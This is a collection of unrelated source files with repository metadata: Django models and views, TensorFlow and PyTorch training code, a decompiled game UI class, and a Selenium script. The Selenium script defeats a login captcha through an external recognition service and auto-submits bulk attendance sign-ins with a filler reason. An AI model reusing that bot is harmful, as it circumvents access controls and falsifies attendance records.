# Generated by Django 2.1.5 on 2019-02-16 09:13
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Mobile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('Model_Name', models.CharField(max_length=50)),
('Image', models.ImageField(upload_to='mobileImage')),
('Brand', models.CharField(max_length=50)),
('Price', models.IntegerField()),
('Face_recognition', models.BooleanField(default=False)),
],
),
]
|
[
"noreply@github.com"
] |
Shrayas1497.noreply@github.com
|
7c49c89d993e3bd614c5f79f232e45bc260b47e1
|
84f073856c8665b0f8b813a46a38f96ccd4f2790
|
/object_detection/models/ssd_mobilenet_v1_ppn_feature_extractor.py
|
258fb41347df9a887a373e84f08bfa886938e62a
|
[] |
no_license
|
fengrk/ml_tools
|
ad9336e47447e9a0f63ba7fc2e86c7eea51c955e
|
70e634250455ff6f3aeb826e781b8096adbdc066
|
refs/heads/master
| 2023-07-19T15:34:46.780323
| 2019-03-02T03:59:53
| 2019-03-02T03:59:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,304
|
py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""SSDFeatureExtractor for MobilenetV1 PPN features."""
import tensorflow as tf
from ml_tools.object_detection.meta_architectures import ssd_meta_arch
from ml_tools.object_detection.models import feature_map_generators
from ml_tools.object_detection.utils import context_manager
from ml_tools.object_detection.utils import ops
from ml_tools.object_detection.utils import shape_utils
from ml_tools.nets import mobilenet_v1
slim = tf.contrib.slim
class SSDMobileNetV1PpnFeatureExtractor(ssd_meta_arch.SSDFeatureExtractor):
"""SSD Feature Extractor using MobilenetV1 PPN features."""
def preprocess(self, resized_inputs):
"""SSD preprocessing.
Maps pixel values to the range [-1, 1].
Args:
resized_inputs: a [batch, height, width, channels] float tensor
representing a batch of images.
Returns:
preprocessed_inputs: a [batch, height, width, channels] float tensor
representing a batch of images.
"""
return (2.0 / 255.0) * resized_inputs - 1.0
def extract_features(self, preprocessed_inputs):
"""Extract features from preprocessed inputs.
Args:
preprocessed_inputs: a [batch, height, width, channels] float tensor
representing a batch of images.
Returns:
feature_maps: a list of tensors where the ith tensor has shape
[batch, height_i, width_i, depth_i]
"""
preprocessed_inputs = shape_utils.check_min_image_dim(
33, preprocessed_inputs)
with tf.variable_scope('MobilenetV1',
reuse=self._reuse_weights) as scope:
with slim.arg_scope(
mobilenet_v1.mobilenet_v1_arg_scope(
is_training=None, regularize_depthwise=True)):
with (slim.arg_scope(self._conv_hyperparams_fn())
if self._override_base_feature_extractor_hyperparams
else context_manager.IdentityContextManager()):
_, image_features = mobilenet_v1.mobilenet_v1_base(
ops.pad_to_multiple(preprocessed_inputs, self._pad_to_multiple),
final_endpoint='Conv2d_13_pointwise',
min_depth=self._min_depth,
depth_multiplier=self._depth_multiplier,
use_explicit_padding=self._use_explicit_padding,
scope=scope)
with slim.arg_scope(self._conv_hyperparams_fn()):
feature_maps = feature_map_generators.pooling_pyramid_feature_maps(
base_feature_map_depth=0,
num_layers=6,
image_features={
'image_features': image_features['Conv2d_11_pointwise']
})
return feature_maps.values()
|
[
"frkhit@gmail.com"
] |
frkhit@gmail.com
|
16febf386bbb52f000770bc909d67557720a0f3b
|
53784d3746eccb6d8fca540be9087a12f3713d1c
|
/res/packages/scripts/scripts/client/gui/Scaleform/daapi/view/meta/BattleEndWarningPanelMeta.py
|
67bbe6c0f9117393281defdf84811f8d3554b181
|
[] |
no_license
|
webiumsk/WOT-0.9.17.1-CT
|
736666d53cbd0da6745b970e90a8bac6ea80813d
|
d7c3cf340ae40318933e7205bf9a17c7e53bac52
|
refs/heads/master
| 2021-01-09T06:00:33.898009
| 2017-02-03T21:40:17
| 2017-02-03T21:40:17
| 80,870,824
| 0
| 0
| null | null | null | null |
WINDOWS-1250
|
Python
| false
| false
| 1,091
|
py
|
# 2017.02.03 21:50:47 Střední Evropa (běžný čas)
# Embedded file name: scripts/client/gui/Scaleform/daapi/view/meta/BattleEndWarningPanelMeta.py
from gui.Scaleform.framework.entities.BaseDAAPIComponent import BaseDAAPIComponent
class BattleEndWarningPanelMeta(BaseDAAPIComponent):
"""
DO NOT MODIFY!
Generated with yaml.
__author__ = 'yaml_processor'
@extends BaseDAAPIComponent
"""
def as_setTotalTimeS(self, minutes, seconds):
if self._isDAAPIInited():
return self.flashObject.as_setTotalTime(minutes, seconds)
def as_setTextInfoS(self, text):
if self._isDAAPIInited():
return self.flashObject.as_setTextInfo(text)
def as_setStateS(self, isShow):
if self._isDAAPIInited():
return self.flashObject.as_setState(isShow)
# okay decompyling c:\Users\PC\wotsources\files\originals\res\packages\scripts\scripts\client\gui\Scaleform\daapi\view\meta\BattleEndWarningPanelMeta.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2017.02.03 21:50:47 Střední Evropa (běžný čas)
|
[
"info@webium.sk"
] |
info@webium.sk
|
0126f26c50a8babbd38d8d7ece652c250b42d88c
|
1b6e103ff6e88b25cfdbd2599010778639c0037b
|
/src/utils/base_trainer.py
|
65c7d7021fb0d0a689792f68ca7a3d6cc511e411
|
[] |
no_license
|
aerubanov/d3s_repro
|
60ba4c8698c73cfff0f14c751ae6a929428f62f6
|
a4a5288821dd2c3193ab24e4aac6d6cf99b94964
|
refs/heads/main
| 2023-06-18T04:00:07.046476
| 2021-07-15T11:20:29
| 2021-07-15T11:20:29
| 377,503,066
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,192
|
py
|
import os
import glob
import torch
from src.utils import loading
class BaseTrainer:
"""Base trainer class. Contains functions for training and saving/loading chackpoints.
Trainer classes should inherit from this one and overload the train_epoch function."""
def __init__(self, actor, loaders, optimizer, settings, lr_scheduler=None):
"""
args:
actor - The actor for training the network
loaders - list of dataset loaders, e.g. [train_loader, val_loader].
In each epoch, the trainer runs one epoch for each loader.
optimizer - The optimizer used for training, e.g. Adam
settings - Training settings
lr_scheduler - Learning rate scheduler
"""
self.actor = actor
self.optimizer = optimizer
self.lr_scheduler = lr_scheduler
self.loaders = loaders
self.update_settings(settings)
self.epoch = 0
self.stats = {}
self.device = getattr(settings, 'device', None)
if self.device is None:
self.device = torch.device("cuda" if torch.cuda.is_available() and settings.use_gpu else "cpu")
print(self.device)
self.actor.to(self.device)
def update_settings(self, settings=None):
"""Updates the trainer settings. Must be called to update internal settings."""
if settings is not None:
self.settings = settings
if self.settings.workspace_dir is not None:
self.settings.workspace_dir = os.path.expanduser(self.settings.workspace_dir)
self._checkpoint_dir = os.path.join(self.settings.workspace_dir, 'checkpoints')
if not os.path.exists(self._checkpoint_dir):
os.makedirs(self._checkpoint_dir)
else:
self._checkpoint_dir = None
def train(self, max_epochs, load_latest=False, fail_safe=True):
"""Do training for the given number of epochs.
args:
max_epochs - Max number of training epochs,
load_latest - Bool indicating whether to resume from latest epoch.
            fail_safe - Bool indicating whether training should automatically restart in case of a crash.
"""
epoch = -1
num_tries = 10
for i in range(num_tries):
try:
if load_latest:
self.load_checkpoint()
for epoch in range(self.epoch+1, max_epochs+1):
self.epoch = epoch
if self.lr_scheduler is not None:
self.lr_scheduler.step()
self.train_epoch()
if self._checkpoint_dir:
self.save_checkpoint()
except:
print('Training crashed at epoch {}'.format(epoch))
if fail_safe:
load_latest = True
print('Restarting training from last epoch ...')
else:
raise
print('Finished training!')
def train_epoch(self):
raise NotImplementedError
def save_checkpoint(self):
"""Saves a checkpoint of the network and other variables."""
actor_type = type(self.actor).__name__
net_type = type(self.actor.net).__name__
state = {
'epoch': self.epoch,
'actor_type': actor_type,
'net_type': net_type,
'net': self.actor.net.state_dict(),
'net_info': getattr(self.actor.net, 'info', None),
'constructor': getattr(self.actor.net, 'constructor', None),
'optimizer': self.optimizer.state_dict(),
'stats': self.stats,
'settings': self.settings
}
directory = '{}/{}'.format(self._checkpoint_dir, self.settings.project_path)
if not os.path.exists(directory):
os.makedirs(directory)
file_path = '{}/{}_ep{:04d}.pth.tar'.format(directory, net_type, self.epoch)
torch.save(state, file_path)
def load_checkpoint(self, checkpoint = None, fields = None,
ignore_fields = None, load_constructor = False):
"""Loads a network checkpoint file.
Can be called in three different ways:
load_checkpoint():
Loads the latest epoch from the workspace. Use this to continue training.
load_checkpoint(epoch_num):
Loads the network at the given epoch number (int).
load_checkpoint(path_to_checkpoint):
Loads the file from the given absolute path (str).
"""
actor_type = type(self.actor).__name__
net_type = type(self.actor.net).__name__
if checkpoint is None:
# Load most recent checkpoint
checkpoint_list = sorted(
glob.glob('{}/{}/{}_ep*.pth.tar'.format(
self._checkpoint_dir,
self.settings.project_path,
net_type)
)
)
if checkpoint_list:
checkpoint_path = checkpoint_list[-1]
else:
print('No matching checkpoint file found')
return
elif isinstance(checkpoint, int):
# Checkpoint is the epoch number
checkpoint_path = '{}/{}/{}_ep{:04d}.pth.tar'.format(
self._checkpoint_dir,
self.settings.project_path,
net_type,
checkpoint)
elif isinstance(checkpoint, str):
# checkpoint is the path
checkpoint_path = os.path.expanduser(checkpoint)
else:
raise TypeError
# Load network
checkpoint_dict = loading.torch_load_legacy(checkpoint_path)
assert net_type == checkpoint_dict['net_type'], 'Network is not of correct type.'
if fields is None:
fields = checkpoint_dict.keys()
if ignore_fields is None:
ignore_fields = ['settings']
# Never load the scheduler. It exists in older checkpoints.
ignore_fields.extend(['lr_scheduler', 'constructor', 'net_type',
'actor_type', 'net_info'])
# Load all fields
for key in fields:
if key in ignore_fields:
continue
if key == 'net':
self.actor.net.load_state_dict(checkpoint_dict[key])
elif key == 'optimizer':
self.optimizer.load_state_dict(checkpoint_dict[key])
else:
setattr(self, key, checkpoint_dict[key])
# Set the net info
if (load_constructor and 'constructor' in checkpoint_dict and
checkpoint_dict['constructor'] is not None):
self.actor.net.constructor = checkpoint_dict['constructor']
if 'net_info' in checkpoint_dict and checkpoint_dict['net_info'] is not None:
self.actor.net.info = checkpoint_dict['net_info']
# Update the epoch in lr scheduler
if 'epoch' in fields:
self.lr_scheduler.last_epoch = self.epoch
return True
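# Illustrative sketch (not part of the original file): a concrete trainer only
# needs to subclass BaseTrainer and implement train_epoch; the names below
# (MyTrainer, actor, loaders, optimizer, settings) are placeholders, not this
# project's real objects.
#
#     class MyTrainer(BaseTrainer):
#         def train_epoch(self):
#             for loader in self.loaders:
#                 for data in loader:
#                     loss, stats = self.actor(data)
#                     self.optimizer.zero_grad()
#                     loss.backward()
#                     self.optimizer.step()
#
#     trainer = MyTrainer(actor, loaders, optimizer, settings)
#     trainer.train(max_epochs=40, load_latest=True)  # resumes from the latest checkpoint if one exists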
|
[
"anatolijrubanov@gmail.com"
] |
anatolijrubanov@gmail.com
|
655fc2da230286506efb37fa4e3fc627064b3cfc
|
fc004129430e8527d763f049d5e3e103968da495
|
/Create Your Own Image Classifier/train.py
|
91291d2e1eef6e213e8754d30449a92de6d9d2a7
|
[
"MIT"
] |
permissive
|
Abhishek20182/AI-Programming-with-Python-Nanodegree-Program
|
8d25d9339f0096ab4375a54a87cc4a97bf39ae1d
|
640e03a527f8b0a6fbb996f0d7a6665edb64800b
|
refs/heads/master
| 2022-11-18T14:26:22.704529
| 2020-06-26T12:34:14
| 2020-06-26T12:34:14
| 262,749,427
| 1
| 0
|
MIT
| 2020-06-03T09:18:04
| 2020-05-10T09:08:29
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 7,734
|
py
|
import numpy as np
import torchvision
import torch
from torch import nn, optim
from torch.optim import lr_scheduler
from torchvision import datasets, models, transforms
from collections import OrderedDict
import argparse
from time import time
def main():
start_time = time()
in_arg = get_input_args()
device = torch.device("cuda:0" if torch.cuda.is_available() and in_arg.gpu else "cpu")
# Load and prepare data
test_datasets, test_dir, train_datasets, train_loader, test_loader = load_data(in_arg.data_dir)
# Build classifier
model, input_size = load_arch(in_arg.arch)
criterion, optimiser = build_classifier(in_arg.hidden_units, in_arg.learning_rate, model, input_size, device)
# Train, test, and validate classifier
validation(test_loader, device, model, criterion)
train_classifier(in_arg.epochs, model, optimiser, device, criterion, train_loader, test_loader)
check_accuracy_on_test(test_loader, device, model)
# Save checkpoint
model.class_to_idx = train_datasets.class_to_idx
torch.save(model, 'check_point.pth')
# Computes overall runtime in seconds
end_time = time()
tot_time = end_time - start_time
# Prints overall runtime in format hh:mm:ss
print("\nTotal Elapsed Runtime:", str( int( (tot_time / 3600) ) ) + ":" +
str( int( ( (tot_time % 3600) / 60 ) ) ) + ":" +
str( int( ( (tot_time % 3600) % 60 ) ) ) )
def get_input_args():
parser = argparse.ArgumentParser(description='Image Classifier')
parser.add_argument('--data_dir', type=str, default='flowers', help='Path to image directory with 3 subdirectories, "train", "valid", and "test"')
parser.add_argument('--arch', type=str, default='vgg19', help='CNN model for image classification; choose either "vgg19" or "alexnet" only')
parser.add_argument('--hidden_units', type=int, default=4096, help='Number of hidden units')
parser.add_argument('--learning_rate', type=float, default=0.001, help='Learning rate for the CNN model')
parser.add_argument('--epochs', type=int, default=9, help='Number of epochs to run')
parser.add_argument('--gpu', type=bool, default=True, help='Train classifier on GPU?')
return parser.parse_args()
def load_data(data_dir):
#Set folder path
data_dir = 'flowers'
train_dir = data_dir + '/train'
valid_dir = data_dir + '/valid'
test_dir = data_dir + '/test'
# Defining transforms for the training, validation, and testing sets
data_transforms = {
'train': transforms.Compose([
transforms.RandomRotation(45),
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])
]),
'valid': transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])
]),
'test': transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])
]),
}
#Load datasets
train_datasets = datasets.ImageFolder(train_dir, transform=data_transforms['train'])
valid_datasets = datasets.ImageFolder(valid_dir, transform=data_transforms['valid'])
test_datasets = datasets.ImageFolder(test_dir, transform=data_transforms['test'])
#Load dataloaders
train_loader = torch.utils.data.DataLoader(train_datasets, batch_size=64, shuffle=True)
valid_loader = torch.utils.data.DataLoader(valid_datasets, batch_size=64, shuffle=True)
test_loader = torch.utils.data.DataLoader(test_datasets, batch_size=64, shuffle=True)
return test_datasets, test_dir, train_datasets, train_loader, test_loader
def load_arch(arch):
if arch=='vgg19':
model = models.vgg19(pretrained=True)
input_size = 25088
elif arch=='alexnet':
model = models.alexnet(pretrained=True)
input_size = 9216
else:
raise ValueError('Please choose either "vgg19" or "alexnet"')
for param in model.parameters():
param.requires_grad = False
return model, input_size
def build_classifier(hidden_units, learning_rate, model, input_size, device):
classifier = nn.Sequential(OrderedDict([
('fc1', nn.Linear(input_size, hidden_units)),
('relu1', nn.ReLU()),
('dropout1', nn.Dropout()),
('fc2', nn.Linear(hidden_units, 102)),
('output', nn.LogSoftmax(dim=1))
]))
model.classifier = classifier
model.to(device)
criterion = nn.NLLLoss()
optimiser = optim.Adam(model.classifier.parameters(), lr=learning_rate)
return criterion, optimiser
def validation(test_loader, device, model, criterion):
test_loss = 0
accuracy = 0
for inputs, labels in test_loader:
inputs, labels = inputs.to(device), labels.to(device)
output = model.forward(inputs)
test_loss += criterion(output, labels).item()
ps = torch.exp(output)
equality = (labels.data == ps.max(dim=1)[1])
accuracy += equality.type(torch.FloatTensor).mean()
return test_loss, accuracy
def train_classifier(epochs, model, optimiser, device, criterion, train_loader, test_loader):
epochs = epochs
print_every = 64
for e in range(epochs):
running_loss = 0
steps = 0
start = time()
model.train()
for inputs, labels in train_loader:
steps += 1
optimiser.zero_grad()
inputs, labels = inputs.to(device), labels.to(device)
output = model.forward(inputs)
loss = criterion(output, labels)
loss.backward()
optimiser.step()
running_loss += loss.item()
if steps % print_every == 0:
# Set network in evaluation mode for inference
model.eval()
# Turn off gradients for validation to save memory and computations
with torch.no_grad():
test_loss, accuracy = validation(test_loader, device, model, criterion)
print("Epoch: {}/{}.. ".format(e+1, epochs),
"Training Loss: {:.3f}.. ".format(running_loss/print_every),
"Test Loss: {:.3f}.. ".format(test_loss/len(test_loader)),
"Test Accuracy: {:.3f}".format(accuracy/len(test_loader)),
"Device: {}...Time: {:.3f}s".format(device, (time() - start)/3))
running_loss = 0
start = time()
# Turn training back on
model.train()
print("End")
# Test trained network on test data
def check_accuracy_on_test(test_loader, device, model):
correct = 0
total = 0
with torch.no_grad():
for data in test_loader:
inputs, labels = data
inputs, labels = inputs.to(device), labels.to(device)
outputs = model(inputs)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
print('Accuracy of the network on the 10000 test images: %d %%' % (100 * correct / total)) #ok
# Call to main function to run the program
if __name__ == '__main__':
main()
|
[
"noreply@github.com"
] |
Abhishek20182.noreply@github.com
|
22a4807e38b136dd298ef817f620f34a8bbbc067
|
d9dbcb98c151155a2eb11dfcedd9201d6291e0dd
|
/5problems_pt5/duplicateZeroes.py
|
fd198875188f47c0fd296fb0c9859e491e8eceee
|
[] |
no_license
|
Absurd1ty/Python-Practice-All
|
41481aaf94e936a82308dfc88016b9969ddb875c
|
ac56a8fb44dd311e81e1eb62a37952c3328c5f17
|
refs/heads/master
| 2023-03-31T12:20:35.812628
| 2021-04-06T01:15:35
| 2021-04-06T01:15:35
| 299,475,551
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 429
|
py
|
class Solution:
def duplicateZeros(self, arr: [int]):
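        # In-place scan: whenever a zero is found, shift the remaining tail one
        # slot to the right and write a second zero, letting the last element fall off.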
i = 0
length = len(arr)
while i < length - 1:
if arr[i] == 0:
currSub = arr[i+1:length-1]
arr[i+1] = 0
arr[i+2:length] = currSub
i += 2
else: i += 1
return arr
result = Solution().duplicateZeros( [1,0,2,3,0,4,5,0])
print(result)
|
[
"noreply@github.com"
] |
Absurd1ty.noreply@github.com
|
fd9ae2fc52ef3eb168f0bee16f72dad075340ad9
|
471cf22054b01e911474a342f379bf1000c5f268
|
/auto_login.py
|
b8f000c3440265e8bf9e92c17bc4f58aa495fe1a
|
[] |
no_license
|
Tsukasa007/ktkjLogin
|
901beb23f8e439defe4aee9522b8705aa31dfec9
|
8a772276a440a7bd2bd1badca03d3eacb5c1591d
|
refs/heads/master
| 2023-05-27T10:09:10.728842
| 2020-05-06T14:43:47
| 2020-05-06T14:43:47
| 205,136,050
| 2
| 0
| null | 2023-05-22T22:16:55
| 2019-08-29T10:12:06
|
Python
|
UTF-8
|
Python
| false
| false
| 6,436
|
py
|
# time is imported for adding delays so pages can finish loading
import time
from selenium import webdriver
from PIL import Image, ImageEnhance
import requests
from selenium.webdriver.support.select import Select
import sys
import codecs
import json
import logging
def isElementExist(browser, element):
flag = True
try:
browser.find_element_by_link_text(element)
return flag
except:
flag = False
return flag
def saveImg(browser, imgPath):
browser.get_screenshot_as_file(imgPath)
location = browser.find_element_by_xpath("//*[@id='imgId']").location
size = browser.find_element_by_xpath("//*[@id='imgId']").size
left = location['x']
top = location['y']
right = location['x'] + size['width']
bottom = location['y'] + size['height']
img = Image.open(imgPath).crop((left, top, right, bottom))
img.save(imgPath)
def get_browser(chrome_driver_dir):
    chrome_options = webdriver.ChromeOptions()
    chrome_options.add_argument('--no-sandbox')  # avoids the "DevToolsActivePort file doesn't exist" error
    chrome_options.add_argument('window-size=1280x720')  # set the browser resolution
    chrome_options.add_argument('--disable-gpu')  # the Chrome docs suggest this flag to work around a bug
    chrome_options.add_argument('--hide-scrollbars')  # hide scrollbars to cope with some special pages
    # chrome_options.add_argument('blink-settings=imagesEnabled=false')  # skip loading images to speed things up
    # chrome_options.add_argument('--headless')  # no visible window; on Linux without a display, startup fails unless this is set
    # open the site in the automated browser
# browser = webdriver.Chrome(chrome_options=chrome_options)
browser = webdriver.Chrome(executable_path=chrome_driver_dir, chrome_options=chrome_options)
browser.set_window_size(1280, 720)
browser.get('https://ktyw.gdcattsoft.com:8081/ktyw/login.jsp')
return browser
def start(username, password, check_code_url, chrome_driver_dir, save_img_dir, login_success_url, attendance_url,
sleep_tiem):
browser = get_browser(chrome_driver_dir)
isLogin = False
isSuccess = False
while not isLogin:
logging.info(browser.title)
        # maximize the window
        # browser.maximize_window()
        # find the button by xpath and simulate a click
        # browser.find_element_by_xpath('/html/body/div[1]/div/div[4]/span/a[1]').click()
        # wait so the page can load every element and later lookups do not fail
time.sleep(sleep_tiem * 5)
logging.info("输入账号: " + username)
u = browser.find_element_by_xpath(
"//*[@id='sAccount']")
time.sleep(sleep_tiem)
u.send_keys(username)
logging.info('输入密码: ' + password)
time.sleep(sleep_tiem)
browser.find_element_by_xpath(
"//*[@id='sPasswd']").send_keys(password)
time.sleep(sleep_tiem)
saveImg(browser, save_img_dir)
logging.info("保存图片")
        # recognize the captcha
files = {'image_file': ("screenImg.png", open(save_img_dir, 'rb'), 'application')}
r = requests.post(url=check_code_url, files=files)
verify_code = json.loads(r.text)['value']
logging.info("识别出验证码: " + verify_code)
logging.info("填写验证码: " + verify_code)
time.sleep(sleep_tiem)
browser.find_element_by_xpath(
"//*[@id='sValidataCode']").send_keys(verify_code)
time.sleep(sleep_tiem)
        # after the username and password are filled in, click the login button
logging.info("点击登录")
browser.find_element_by_xpath("//*[@id='LoginButton']").click()
time.sleep(sleep_tiem)
if isElementExist(browser, '确定'):
logging.info("顶人下号")
browser.find_element_by_link_text('确定').click()
time.sleep(sleep_tiem)
if login_success_url in browser.current_url:
isLogin = True
logging.info("登录成功!")
browser.find_element_by_id("tab_content_todoNone")
else:
browser.get('https://ktyw.gdcattsoft.com:8081/ktyw/login.jsp')
time.sleep(sleep_tiem)
while not isSuccess:
logging.info("转到签到页面: " + attendance_url)
browser.get(attendance_url)
time.sleep(sleep_tiem)
logging.info("全部打钩")
browser.find_element_by_class_name("datagrid-header-check").click()
time.sleep(sleep_tiem)
logging.info("点击批量签到")
browser.find_element_by_class_name("edit").click()
time.sleep(sleep_tiem)
browser.switch_to.frame(browser.find_element_by_xpath("//iframe[contains(@src,'editAttendanceSign.jsp')]"))
time.sleep(sleep_tiem)
# browser.find_element_by_class_name('panel-tool-close').click()
Select(browser.find_element_by_id('IREASON')).select_by_value("99")
logging.info("选择其他99")
time.sleep(sleep_tiem)
browser.find_element_by_name("SREMARK").send_keys("其他其他!213")
time.sleep(sleep_tiem * 2)
browser.find_element_by_css_selector("[class='z-btn-text icon-sub']").click()
# if isElementExist(browser, '操作成功!'):
browser.close()
logging.info("签到成功")
# isSuccess = True
# else:
# browser.switch_to.parent_frame()
def main():
with open("conf/login.json", "r") as f:
login_conf = json.load(f)
username = login_conf["username"]
password = login_conf["password"]
check_code_url = login_conf["check_code_url"]
save_img_dir = login_conf["save_img_dir"]
chrome_driver_dir = login_conf["chrome_driver_dir"]
login_success_url = login_conf["login_success_url"]
attendance_url = login_conf["attendance_url"]
sleep_time = login_conf["sleep_time"]
start(username, password, check_code_url, chrome_driver_dir, save_img_dir, login_success_url, attendance_url,
sleep_time)
if __name__ == '__main__':
sys.stdout = codecs.getwriter("utf-8")(sys.stdout.detach())
fmt = '%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s: %(message)s'
logging.FileHandler(filename='./logs.txt', encoding='utf-8')
logging.basicConfig(level=logging.INFO,
format=fmt,
datefmt='%a, %d %b %Y %H:%M:%S')
main()
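# For reference (illustrative values only), main() expects conf/login.json with these keys:
# {
#     "username": "...", "password": "...",
#     "check_code_url": "http://<captcha-recognition-service>/",
#     "save_img_dir": "screenImg.png",
#     "chrome_driver_dir": "/path/to/chromedriver",
#     "login_success_url": "<substring of the post-login URL>",
#     "attendance_url": "https://<attendance page>",
#     "sleep_time": 1
# }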
|
[
"819582890@qq.com"
] |
819582890@qq.com
|
255421d0e034c53a80bd67fa8cc148e46cebc61e
|
792ae5d2a5c17af4f2ccfa582e3aeec569a6809a
|
/63. Unique Paths II.py
|
1c1f98c62a83cb4c0a740bec2578fdbc20ae5fc5
|
[] |
no_license
|
ADebut/Leetcode
|
396b8b95ad5b5e623db2839bbfdec861c4c1731f
|
7333d481e00e8c1bc5b827d1d4ccd6e4d291abd7
|
refs/heads/master
| 2020-07-05T18:48:27.504540
| 2019-10-28T10:51:43
| 2019-10-28T10:51:43
| 202,735,925
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 733
|
py
|
class Solution:
def uniquePathsWithObstacles(self, obstacleGrid: List[List[int]]) -> int:
m = len(obstacleGrid)
n = len(obstacleGrid[0])
if obstacleGrid[0][0] == 1:
return 0
dp = [0 for i in range(n)]
for i in range(n):
if obstacleGrid[0][i] == 1:
dp[i] = 0
break
else:
dp[i] = 1
for i in range(i + 1, n):
dp[i] = 0
for i in range(1, m):
for j in range(n):
if obstacleGrid[i][j] == 1:
dp[j] = 0
else:
if j != 0:
dp[j] = dp[j] + dp[j - 1]
return dp[n-1]
|
[
"chen758@usc.edu"
] |
chen758@usc.edu
|
4c3dfe89b2dd19e2f9ef5c8427be243e88a7ff96
|
0319704980f5134701ea97361b8c585839e853bc
|
/Spider/FuZhouTourSpider.py
|
fd53316b39fd1b609374c11940a86b6dfa1a4da3
|
[] |
no_license
|
ttxx9999/ArticleSpider
|
a35785453849c6ce7eda7ac6adccd7752d6b5e8f
|
8f981359273062b8b22de022c7e6999044ebb5f5
|
refs/heads/master
| 2021-01-20T22:01:52.256542
| 2014-10-29T09:21:07
| 2014-10-29T09:21:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,845
|
py
|
import Spider
import re
import logging
import datetime
class FuZhouTourSpider(Spider.Spider):
"""福州旅游资讯网 Spider"""
def __init__(self):
Spider.Spider.__init__(self)
def CatchArticles(self):
abstracts = None
html = self.DownLoadHtml(self.url.format(20, 1), '文章摘要接口{0}访问失败,异常信息为:{1}')
if html == None:
return self.articles
try:
html = html.replace('null', 'None')
abstracts = eval(html)
except Exception as e:
logging.warn('文章摘要信息{0}格式异常,异常信息为:{1}'.format(html, str(e)))
return self.articles
for x in abstracts['data']:
try:
article = dict(
time = datetime.datetime.strptime(x['POST_TIME'].split('.')[0], '%Y-%m-%dT%H:%M:%S'),
url = self.reAbstract.format(x['NEWS_ID']),
title = x['TITLE']
)
html = self.DownLoadHtml(article['url'], '文章明细接口{0}访问失败,异常信息为:{1}')
if html == None:
continue
html = html.replace('null', 'None')
articleInfo = eval(html)['data']
content = articleInfo['news']['CONTENT']
images = []
imageCount = 0
for z in articleInfo['MEDIA']:
try:
imageCount += 1
imageUrl = z['URL']
image = self.DownLoadImage(imageUrl, '图片{0}提取失败,异常信息为:{1}')
if image == None:
continue
images.append(image)
content += self.reArticle.format(imageUrl)
except Exception as e:
logging.warn('图片信息{0}格式异常,异常信息为:{1}'.format(str(z), str(e)))
continue
if imageCount != len(images):
continue
self.CacheArticle(article, content, images, '成功自{0}提取文章')
except Exception as e:
logging.warn('文章明细信息{0}格式异常,异常信息为:{1}'.format(str(x), str(e)))
continue
return self.articles
|
[
"liujinglj518@gmail.com"
] |
liujinglj518@gmail.com
|
d21a0a3c588e67332162c3e3f5f513da5e2119b7
|
4ce44cf2bd1a5c2aca5953e5969b603ca2c75990
|
/myProyecto/Petalos/views.py
|
13bcc9f7ff6a9f589afb13c56c788c584c2d630f
|
[] |
no_license
|
jajinho/PetalosFloreria
|
1074c1276c99d7df9b6717bd4cb4e7edfdbe81bd
|
513ba70c095ac12f4f000e053e27437e7b637db0
|
refs/heads/master
| 2020-09-30T04:49:37.994213
| 2019-12-10T21:27:42
| 2019-12-10T21:27:42
| 227,206,642
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,186
|
py
|
from django.shortcuts import render
from .models import Floreria,Ticket
from .clases import elemento
from django.contrib.auth.models import User
from django.contrib.auth import authenticate,logout,login as login_autent
from django.contrib.auth.decorators import login_required
import datetime;
# Create your views here.
@login_required(login_url='/login/')
def grabar_carro(request):
x=request.session["carritox"]
usuario=request.user.username
suma=0
try:
for item in x:
nombre=item["nombre"]
precio=int(item["precio"])
cantidad=int(item["cantidad"])
total=int(item["total"])
ticket=Ticket(
usuario=usuario,
nombre=nombre,
precio=precio,
cantidad=cantidad,
total=total,
fecha=datetime.date.today()
)
ticket.save()
suma=suma+int(total)
print("reg grabado")
mensaje="Grabado"
request.session["carritox"] = []
except:
mensaje="error al grabar"
return render(request,'core/carrito.html',{'x':x,'total':suma,'mensaje':mensaje})
@login_required(login_url='/login/')
def carro_compras(request,id):
p=Floreria.objects.get(name=id)
x=request.session["carritox"]
el=elemento(1,p.name,p.valor,1)
sw=0
suma=0
clon=[]
for item in x:
cantidad=item["cantidad"]
if item["nombre"]==p.name:
sw=1
cantidad=int(cantidad)+1
ne=elemento(1,item["nombre"],item["precio"],cantidad)
suma=suma+int(ne.total())
clon.append(ne.toString())
if sw==0:
clon.append(el.toString())
x=clon
request.session["carritox"]=x
florcita=Floreria.objects.all()
return render(request,'core/galeria.html',{'listaFlores':florcita,'flores':florcita,'total':suma})
@login_required(login_url='/login/')
def carro_compras_mas(request,id):
f=Floreria.objects.get(name=id)
x=request.session["carritox"]
suma=0
clon=[]
for item in x:
cantidad=item["cantidad"]
if item["nombre"]==f.name:
